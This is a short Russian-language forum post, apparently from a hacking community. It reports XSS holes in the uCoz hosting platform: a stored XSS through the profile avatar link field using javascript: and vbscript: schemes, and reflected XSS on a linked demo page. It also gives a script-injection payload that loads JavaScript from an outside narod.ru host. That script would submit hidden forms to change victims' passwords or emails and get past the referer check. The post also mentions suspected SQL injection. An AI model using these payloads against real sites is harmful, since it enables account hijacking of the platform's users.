перед сном глянул юкоз чуток...на пассивные уязвимости.

По поводу активной XSS:
плохая фильтрация
в профайле в поле ссылки на аватуру.
Можно выполнить експлутировать скрипт
javascript: анти-киддис-бгг
vbscript: анти-киддис-бгг

(кстати неплохая активка получилась...
везде где светим аватар везде XSS)

по поводу пассивных их там оч. много.
Ну вот одна просто самая близкая, роли она практически не играет однако как пример,
что XSS там есть сойдёт=)
http://mirinet.narod.ru/ucoz_passiv.html

По поводу создания автоформ для смены пароля или е-майла, проанализировав ситуацию, что вся защита от автоформ строить в проверке реферера.
Понял, что можно експлуатировать наиболее удачную пассивную XSS
и составить запрос типа "><script src=http://mirinet.narod.ru/qwe.js></script>
где в qwe.js будет закодированная автоформа так мы обойдём единственную защиту проверку реферера.
т.к. запрос будет от юкоза=)

По поводу уязвимостей более серьёзных:
было пару подозрений на sql-inj.

всем приятных снов и пока!